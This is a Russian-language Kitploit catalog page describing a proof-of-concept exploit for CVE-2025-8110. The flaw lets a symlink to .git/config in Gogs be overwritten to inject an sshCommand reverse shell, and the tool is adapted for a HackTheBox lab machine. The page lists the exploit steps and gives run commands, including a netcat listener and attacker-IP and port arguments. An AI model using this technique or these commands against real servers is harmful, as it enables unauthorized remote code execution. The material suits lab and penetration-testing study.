Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-8110 — Эксплойт Gogs service и получение root-пользователя | Kitploit
Инструменты/GitHubGitHub/ixzodiak/cve-2025-8110
ЭксплуатацияЭксплуатация веб-приложенийCTFТестирование на ПроникновениеОбучение и ОбразованиеRed TeamingИнструмент Удаленного Доступа
GitHubixzodiak/cve-2025-8110

CVE-2025-8110

Эксплойт Gogs service и получение root-пользователя

Репозиторий
491 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-8110 — Gogs RCE PoC (Silentium / HackTheBox)

Предупреждение: Этот инструмент предназначен строго для образовательных целей и авторизованного тестирования на проникновение. Используйте его только против систем, на тестирование которых у вас есть явное разрешение.


Это модифицированная версия zAbuQasem/gogs-CVE-2025-8110, адаптированная для работы с машиной Silentium на HackTheBox. Оригинальный PoC требовал корректировок для обработки специфической конфигурации Gogs и процесса аутентификации Silentium.


Уязвимость

CVE-2025-8110 — это уязвимость удаленного выполнения кода в Gogs, самостоятельно размещаемом Git-сервисе.

API-эндпоинт обновления файлов Gogs (PUT /api/v1/repos/.../contents/<file>) не проверяет, является ли целевой файл символической ссылкой. Аутентифицированный злоумышленник может поместить символическую ссылку в репозиторий, указывающую на .git/config, а затем с помощью API перезаписать её вредоносной полезной нагрузкой. Полезная нагрузка внедряет пользовательскую команду sshCommand в конфигурацию git, которую Gogs выполняет на стороне сервера при следующей SSH-операции с этим репозиторием, что приводит к удаленному выполнению кода.


Что делает PoC

  1. Выполняет аутентификацию в Gogs и извлекает CSRF-токен со страницы входа.
  2. Генерирует API-токен Gogs через страницу настроек пользователя.
  3. Создает новый репозиторий через API с включенным SSH.
  4. Клонирует репозиторий локально, размещает символическую ссылку (malicious_link -> .git/config) и отправляет её.
  5. Вызывает API обновления файлов на символической ссылке, записывая вредоносный .git/config, содержащий sshCommand = <reverse shell>.
  6. Gogs следует за символической ссылкой и перезаписывает свой собственный .git/config, запуская оболочку при следующей SSH-операции.

Использование

Установка зависимостей:

root@kitploit:~
pip install -r requirements.txt

Запуск слушателя:

root@kitploit:~
nc -lvnp <PORT>

Запуск эксплойта:

root@kitploit:~
python3 CVE-2025-8110.py -u http://<TARGET_URL> -lh <YOUR_IP> -lp <PORT> -un <USERNAME> -pw <PASSWORD>

Опционально — маршрутизация через Burp Suite:

root@kitploit:~
python3 CVE-2025-8110.py -u http://<TARGET_URL> -lh <YOUR_IP> -lp <PORT> -un <USERNAME> -pw <PASSWORD> -x
ФлагОписание
-uБазовый URL Gogs
-lhВаш IP атакующего (хост обратной оболочки)
-lpВаш порт слушателя
-unВаше зарегистрированное имя пользователя Gogs
-pwВаш пароль Gogs
-x(Опционально) Маршрутизация трафика через Burp на localhost:8080
Скачать инструмент